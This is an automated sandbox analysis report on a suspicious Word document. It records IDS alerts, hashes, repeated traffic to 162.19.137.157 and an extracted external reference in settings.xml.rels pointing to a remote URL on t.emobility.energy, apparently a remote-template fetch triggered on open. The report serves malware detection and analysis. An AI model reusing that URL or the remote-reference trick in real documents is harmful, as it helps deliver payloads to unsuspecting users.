Edit tour

Windows Analysis Report
Untitled_20250325.docx.doc

Overview

General Information

Sample name:Untitled_20250325.docx.doc
Analysis ID:1647950
MD5:e00b2ef0073a6021cc012dcf5d5ad70c
SHA1:c3dd54e43063122bcb849736ce7fe26ea27344cc
SHA256:f7821649e3f5fdb5cccba8f154ef19d8c59f46ca980059cf20a1d79b2f541bad
Tags:docuser-TeamDreier
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Contains an external reference to another file
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • WINWORD.EXE (PID: 8076 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49717, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 8076, Protocol: tcp, SourceIp: 162.19.137.157, SourceIsIpv6: false, SourcePort: 443
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-25T12:47:44.471240+010020283713Unknown Traffic192.168.2.549717162.19.137.157443TCP
2025-03-25T12:47:46.006761+010020283713Unknown Traffic192.168.2.549719162.19.137.157443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-25T12:47:45.563705+010018100051Potentially Bad Traffic192.168.2.549718162.19.137.157443TCP

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: global trafficDNS query: name: t.emobility.energy
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49717 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49717
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49718
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49718 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49719
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49721
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49721
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49721
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49721
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49721
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49721
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49721
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 162.19.137.157:443 -> 192.168.2.5:49721
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: global trafficTCP traffic: 192.168.2.5:49721 -> 162.19.137.157:443
Source: winword.exeMemory has grown: Private usage: 2MB later: 74MB

Networking

barindex
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.5:49718 -> 162.19.137.157:443
Source: Joe Sandbox ViewIP Address: 162.19.137.157 162.19.137.157
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 162.19.137.157:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 162.19.137.157:443
Source: global trafficHTTP traffic detected: GET /JpXyeF?&achiever HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: t.emobility.energyConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /JpXyeF?&achiever HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: t.emobility.energyConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: t.emobility.energy
Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 25 Mar 2025 11:47:44 GMTServer: Apache/2.4.62 (Debian)Content-Length: 384Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 25 Mar 2025 11:47:45 GMTServer: Apache/2.4.62 (Debian)Content-Length: 384Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 25 Mar 2025 11:47:46 GMTServer: Apache/2.4.62 (Debian)Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 25 Mar 2025 11:47:47 GMTServer: Apache/2.4.62 (Debian)Content-Length: 384Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownHTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.19.137.157:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: classification engineClassification label: mal52.evad.winDOC@2/1@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$titled_20250325.docx.docJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{638F61A7-B228-44EB-8B6F-4622C65F4A60} - OProcSessId.datJump to behavior
Source: Untitled_20250325.docx.docOLE indicator, Word Document stream: true
Source: Untitled_20250325.docx.docOLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Untitled_20250325.docx.docInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: Untitled_20250325.docx.docInitial sample: OLE zip file path = word/media/image2.emf
Source: Untitled_20250325.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Untitled_20250325.docx.docInitial sample: OLE summary lastprinted = 2020-10-16 02:53:17
Source: Untitled_20250325.docx.docInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: settings.xml.relsExtracted files from sample: https://t.emobility.energy/jpxyef?&achiever
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
